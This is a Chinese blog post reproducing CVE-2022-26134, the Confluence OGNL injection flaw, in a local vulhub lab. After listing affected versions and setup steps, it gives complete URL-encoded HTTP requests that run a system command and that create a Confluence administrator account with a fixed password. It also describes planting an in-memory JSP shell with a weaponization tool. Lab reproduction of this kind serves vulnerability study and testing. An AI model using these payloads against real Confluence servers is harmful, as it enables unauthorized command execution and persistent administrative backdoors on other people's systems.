• CVE-2022-26134 Confluence OGNL表达式注入命令执行漏洞复现

    目录

    漏洞相关介绍

    漏洞类型

    影响版本

    漏洞复现

    漏洞环境

    复现过程

    下载vulhub搭建

     申请license

    初始化过程 ​编辑

     初始化空间

    复现POC

    rce

     加账户

    武器化

    内存shell

    加账户

    漏洞相关介绍

    漏洞类型

    命令执行

    影响版本

    Confluence Server and Data Center >= 1.3.0
    Confluence Server and Data Center < 7.4.17
    Confluence Server and Data Center < 7.13.7
    Confluence Server and Data Center < 7.14.3
    Confluence Server and Data Center < 7.15.2
    Confluence Server and Data Center < 7.16.4
    Confluence Server and Data Center < 7.17.4
    Confluence Server and Data Center < 7.18.1

    漏洞复现

    漏洞环境

    vulhub  Confluence Server 7.13.6

    复现过程

    下载vulhub搭建

    docker-compose up -d

     申请license

    访问:本地8090端口,点击申请license

    默认勾选datacenter

     跳转,默认勾选

     填写完毕后

    这里选择应jdbcurl连接,host为db,账号密码均为postgres

     

    初始化过程

     这里出现两个勾选项目:1 设置管理员账户密码  2 连接到Jira

     Next,of

     初始化空间

    复现POC

    rce

    以下为poc

    1. GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
    2. Host: 192.168.0.104:8090
    3. Accept-Encoding: gzip, deflate
    4. Accept: */*
    5. Accept-Language: en
    6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    7. Connection: close
    8. Content-Length: 2
    9.  
    10.

     加账户

    /%24%7B%23this.getUserAccessor%28%29.addUser%28%27httpvoid%27%2c%27pwn@1234%27%2c%27pwn@httpvoid.com%27%2c%27HttpVoid%27%2c@com.atlassian.confluence.util.GeneralUtil@splitCommaDelimitedString%28%22confluence-administrators,confluence-users%22%29%29%7D/

    数据包:

    1. GET /%24%7B%23this.getUserAccessor%28%29.addUser%28%27httpvoid%27%2c%27pwn@1234%27%2c%27pwn@httpvoid.com%27%2c%27HttpVoid%27%2c@com.atlassian.confluence.util.GeneralUtil@splitCommaDelimitedString%28%22confluence-administrators,confluence-users%22%29%29%7D/
    2.  HTTP/1.1
    3. Host: 192.168.0.104:8090
    4. Accept-Encoding: gzip, deflate
    5. Accept: */*
    6. Accept-Language: en
    7. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    8. Connection: close
    9. Content-Length: 2
    10.  
    11.

    当前用户

    执行以上poc后,退出当前用户

    被增加的账户名和密码:

    httpvoid

    pwn@1234

    武器化

    内存shell

    使用 woodpecker工具以及深蓝大佬写的武器化插件

     

    扫描探测,勾选send to poc

     后利用,勾选send to Exploit,选择CVE-2022--26134,执行exploit

    连接shell,jsp类型

     

    加账户

  • 相关阅读:
    [架构之路-18]:目标系统 - 硬件平台 - 案例1 - 单片机MCU STM32 芯片的工作原理与启动流程
    软件项目管理 7.5.项目进度模型(SPSP)
    Lua快速入门教程
    【人工智能】神经网络八股
    SpringMVC之JSON返回&异常处理机制
    SQLyog连接数据库报错plugin caching_sha2_password could not be loaded
    2022牛客蔚来杯第二场 G J K L D C (H)
    Redis面试题
    Maven中<scope>中等级的区别
    [S2] Challenge 25 心脏病预测
  • 原文地址:https://blog.csdn.net/qq_38376348/article/details/125459671